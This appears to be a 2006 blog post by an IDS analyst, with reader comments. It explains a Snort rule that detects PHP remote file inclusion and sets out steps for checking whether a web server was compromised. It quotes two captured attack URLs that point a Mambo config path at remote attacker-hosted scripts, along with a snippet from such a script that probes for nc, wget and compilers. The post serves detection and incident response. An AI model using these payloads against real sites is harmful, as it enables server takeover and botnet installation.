work and IT @ 03 Dec 2006 11:20 am by ayoi
As we are using snort as our IDS engine, the alerts that will be discussed here are mainly based on snorts. So dun ask me about other IDS (Even tho I do believe that most of them are similar)
p/s: Dun expect me to provide a very very detail explaination aaa.. I ain’t got any degree. But you are welcome to post/email/comment (ok maybe not post but comment) your opinion/suggestion/views. I will be grateful for that.
Requirement - Know whut the hell is IDS (And to one particular candidate from one technology university from south, IDS is not a firewall and it is definitely not a policy system of segmenting our network by using VLAN for security purpose)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:”WEB-PHP remote include path”; flow:established,to_server; uricontent:”.php”; content:”path=”; pcre:”/path=(http|https|ftp)/i”; classtype:web-application-attack; sid:2002; rev:5;)
This alert will triggered when there’s connection(flow:established,) from external network ($EXTERNAL_NET) any port to the webserver thru its service port ($HTTP_SERVERS $HTTP_PORTS)containing /path=(either http, https or ftp) case sensitive (content:”path=”; *pcre:”/path=(http|https|ftp)/i”) And of cause, the protocol has to be tcp.
*perl compatible regular expression. Read here and here
I know this alert is quite alarming due to the fact that many of our clients compromised(ok laa defaced is more appropriate hehehe) due to their inability to make their application current.
For example : http://1.2.3.4/test/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=
&mosConfig_absolute_path=http://xargonu.evonet.ro/tool25.txt?
and
GET test/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://
symphoenix.scriptmania.com/symphoenix.gif?
For both of the payloads above, we can see that there’re attempt on manipulating or overiding the mambo config path. As for payload 1, the intruder is trying to confusing(ok ok it’s not an appropriate term) the system to read/access its component content from *http://xargonu.evonet.xx/tool25.txt
*I will never, ever put that file on this server. So snippets of the code in that txt file is sufficient.
Bold indicates the content that matches one of the remote include path’s rule criteria
snippet 1.
#//INFO table (pro and normal)
#/*if (@file_exists(”/usr/X11R6/bin/xterm”)) $pro1=”xterm at /usr/X11R6/bin/xterm, “;
#if (@file_exists(”/usr/bin/nc”)) $pro2=”nc at /usr/bin/nc, “;
#if (@file_exists(”/usr/bin/wget”)) $pro3=”wget at /usr/bin/wget, “;
#if (@file_exists(”/usr/bin/lynx”)) $pro4=”lynx at /usr/bin/lynx, “;
#if (@file_exists(”/usr/bin/gcc”)) $pro5=”gcc at /usr/bin/gcc, “;
#if (@file_exists(”/usr/bin/cc”)) $pro6=”cc at /usr/bin/cc “;*/
Based on the code (not snippets aaa) we can roughly know whut are the intentions of the attacker. This attacker simply want to have server access and basically he administering that system thru web. If the webmaster didn’t check his access log, I guess he shud hand over his job to the attacker. But most of the these attackers just want to have control on the system thru irc bots or botnets. I guess all of you already know how devastating this can be. 
So how the hell do we know whether the system affected or not by this attempt.
1. Examine the exploit scripts/codes. Identify which platform/Os/apps vulnerable to the attack. <– If possible (most of the time it’s possible :D)
2. Identify whether the victims are vulnerable to the attack - platform/os/apps
3. Check if there’re any outbound traffic from the attacked server/system. (extrusion detection)
4. Look for any other signature/alerts triggered for the attacked system, and also alerts from the source(attacker)
That’s the only thing that you can do for time being. As we dun have the luxury of accessing any other types of data.
If possible
Ask the administrator to give/send you the access log (not the error logs ok?)
Ask the administrator to check his system network connection via netstat
Ask the administrator to identify foreign process running (esp if the attacker successfully install the botnet) usually starts with a dot slash. eg ./httpd instead of httpd
Check his /tmp dir and look for any unauthorized, foreign, alien files in there.
So that’s all for time being. As its 3.18 in the morning and I’m lil bit dizzy. This simple guide is mainly for my team and I welcome any suggestions/comments or improvement on analysis method or materials needed. Thanks for reading this long post.
p/s : error on posting the snippet 2. sorry
Looking for all world writtable directories, such as /tmp, /dev/shm and as well as user home directory, I usually run my own script of digging out all perl files that belong to user who runs the web server(nobody or _apache) on those three directories and you will most properly figure out which particular sites are exploited.
Looking at web server log surely gives a clue and it is always good to correlate host services log with the network alert data.
Since this is mostly done by the automated coded worms, some of them will perform deletion on the script once it is executed so that you won’t be able to analyse their script, that’s where session/flow data delivers its value because it definitely tells you where your server has connected to download the malicious script and so forth.
Maybe in the future, hire the NSM analyst instead of IDS analyst
Yes…i agree with you geek00L….I think NSM is better than IDS….
It’s kinda difficult to hire a proper security analyst. Whut I mean is the one who knows (basics/little bit/aware) of security. To find a candidate who know or even aware of NSM, that’s a miracle.
I do really hope if anyone who think they can do the job, please come forward. Susah ini macem..